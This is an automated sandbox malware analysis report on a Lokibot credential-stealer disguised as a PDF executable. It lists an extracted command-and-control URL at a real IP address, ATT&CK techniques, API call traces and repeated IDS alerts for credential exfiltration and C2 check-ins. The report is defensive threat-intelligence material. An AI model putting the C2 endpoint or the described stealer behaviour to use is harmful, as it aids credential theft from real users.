Loading ...

Play interactive tourEdit tour

Analysis Report scan0098788_pdf.exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:219229
Start date:31.03.2020
Start time:16:46:57
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 42s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:scan0098788_pdf.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:5
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.spyw.evad.winEXE@5/2@0/1
EGA Information:
  • Successful, ratio: 66.7%
HDC Information:
  • Successful, ratio: 97.9% (good quality ratio 93.9%)
  • Quality average: 77.2%
  • Quality standard deviation: 28.5%
HCA Information:
  • Successful, ratio: 63%
  • Number of executed functions: 52
  • Number of non-executed functions: 247
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
  • Execution Graph export aborted for target scan0098788_pdf.exe, PID 920 because there are no executed function
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Lokibot
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts2Execution through API1Valid Accounts2Exploitation for Privilege Escalation1Disabling Security Tools1Credential Dumping2System Time Discovery2Remote File Copy1Man in the Browser1Data Encrypted1Remote File Copy1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Replication Through Removable MediaGraphical User Interface2Application Shimming1Valid Accounts2Deobfuscate/Decode Files or Information1Input Capture21Account Discovery1Remote ServicesData from Local System2Exfiltration Over Other Network MediumStandard Cryptographic Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesWindows Management InstrumentationAccessibility FeaturesAccess Token Manipulation21Obfuscated Files or Information2Credentials in Registry2Security Software Discovery31Windows Remote ManagementEmail Collection1Automated ExfiltrationStandard Non-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareProcess Injection112Masquerading1Credentials in FilesFile and Directory Discovery2Logon ScriptsInput Capture21Data EncryptedStandard Application Layer Protocol11SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationApplication Shimming1Valid Accounts2Account ManipulationSystem Information Discovery27Shared WebrootClipboard Data2Scheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceVirtualization/Sandbox Evasion1Brute ForceVirtualization/Sandbox Evasion1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskAccess Token Manipulation21Two-Factor Authentication InterceptionProcess Discovery2Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionProcess Injection112Bash HistoryApplication Window Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess InjectionInput PromptSystem Owner/User Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Found malware configurationShow sources
Source: scan0098788_pdf.exe.1044.3.memstrMalware Configuration Extractor: Lokibot {"c2:": "http://108.170.31.41/dozlogs/logs/fre.php"}
Multi AV Scanner detection for submitted fileShow sources
Source: scan0098788_pdf.exeReversingLabs: Detection: 41%

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00F4449B GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F4449B
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F4449B GetFileAttributesW,FindFirstFileW,FindClose,2_2_00F4449B
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F4C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00F4C7E8
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F4C75D FindFirstFileW,FindClose,2_2_00F4C75D
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F4F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00F4F021
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F4F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00F4F17E
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F4F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00F4F47F
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F43833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00F43833
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F43B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00F43B56
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F4BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00F4BD48
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,3_2_00403D74

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49746 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49746 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49746 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49746 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49747 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49747 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49747 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49747 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49748 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49748 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49748 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49748 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49748
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49749 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49749 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49749 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49749 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49749
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49753 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49753 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49753 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49753 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49753
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49754 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49754 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49754 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49754 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49754
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49755 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49755 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49755 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49755 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49755
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49756 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49756 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49756 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49756 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49756
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49757 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49757 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49757 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49757 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49757
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49758 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49758 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49758 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49758 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49758
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49759 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49759 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49759 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49759 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49759
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49760 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49760 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49760 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49760 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49760
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49761 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49761 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49761 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49761 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49761
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49762 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49762 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49762 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49762 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49762
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49763 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49763 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49763 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49763 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49763
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49764 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49764 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49764 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49764 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49764
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49765 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49765 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49765 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49765 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49765
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49766 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49766 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49766 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49766 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49766
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49767 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49767 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49767 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49767 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49767
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49768 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49768 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49768 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49768 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49768
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49769 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49769 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49769 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49769 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49769
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49770 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49770 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49770 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49770 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49770
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49771 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49771 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49771 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49771 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49771
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49772 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49772 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49772 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49772 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49772
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49773 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49773 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49773 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49773 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49773
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49774 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49774 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49774 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49774 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49774
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49775 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49775 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49775 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49775 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49775
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49776 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49776 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49776 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49776 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49776
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49777 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49777 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49777 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49777 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49777
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49778 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49778 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49778 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49778 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49778
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49779 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49779 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49779 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49779 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49779
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49780 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49780 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49780 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49780 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49780
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49781 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49781 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49781 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49781 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49781
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49782 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49782 -> 108.170.31.41:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49782 -> 108.170.31.41:80
